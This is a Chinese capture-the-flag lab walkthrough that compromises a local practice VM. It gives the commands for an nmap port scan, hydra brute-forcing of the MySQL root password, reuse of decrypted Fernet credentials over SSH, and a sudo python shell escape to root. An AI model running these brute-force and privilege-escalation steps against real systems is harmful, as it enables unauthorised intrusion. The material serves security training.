攻防靶场——没有Web怎么打

1. 侦查

1.1 收集目标网络信息：IP地址

1.2 主动扫描：扫描IP地址段

1.3 主动扫描：漏洞扫描

2. 初始访问

2.1 有效账户：本地账户

3. 权限提升

3.1 滥用特权控制机制：Sudo或Sudo缓存

1.1 收集目标网络信息：IP地址

设置成NAT模式：

登录之后自动显示出IP为192.168.230.17

1.2 主动扫描：扫描IP地址段

nmap 192.168.230.17 -n -Pn -p- --reason -sV

-n: 不进行DNS解析，直接使用IP地址进行扫描。

-Pn: 假设目标主机是活动的，不进行ping扫描。

-p-: 扫描所有65535个端口。

--reason: 显示每个状态判断的原因（例如，SYN-ACK响应）。

-sV: 进行服务版本检测，尝试确定开放端口上运行的服务及其版本。

发现1337/SSH、3306/MySQL漏洞

1.3 主动扫描：漏洞扫描

用hydra爆破MySQL服务的root用户的弱口令：

hydra -l root -P /home/kali/Desktop/test/dic0.txt 192.168.230.17 mysql

爆破出MySQL的root/prettywoman

2.1 有效账户：本地账户

利用刚才爆出来的MySQL的root/preetywoman来登录MySQL服务

mysql -h 192.168.230.17 -uroot -pprettywoman --skip-ssl

可看出有个data数据库，其他三个是MySQL默认的数据库

查看data数据库的字段内容：

gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=

UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=

根据表名fernet提示，猜测应该是fernet加密，尝试随波逐流解密：

lucy:wJ9`"Lemdv9[FEw-

用户名确认是lucy，密码是wJ9`"Lemdv9[FEw-

根据先前的1337/SSH，尝试ssh连接：

ssh lucy@192.168.230.17 -p 1337

whoami;id;hostname;ip address

现在还是uid=1000(lucy) gid=1000(lucy) groups=1000(lucy)，无root权限

3.1 滥用特权控制机制：Sudo或Sudo缓存

sudo -l列出用户的权限或检查特定命令：

发现能在root权限且无密码的情况下运行/usr/bin/python2 /opt/exp.py

python命令能用于提权

sudo python -c 'import os; os.system("/bin/sh")'

import os; os.system("/bin/sh"); os.setuid(0)

成功sudo提权！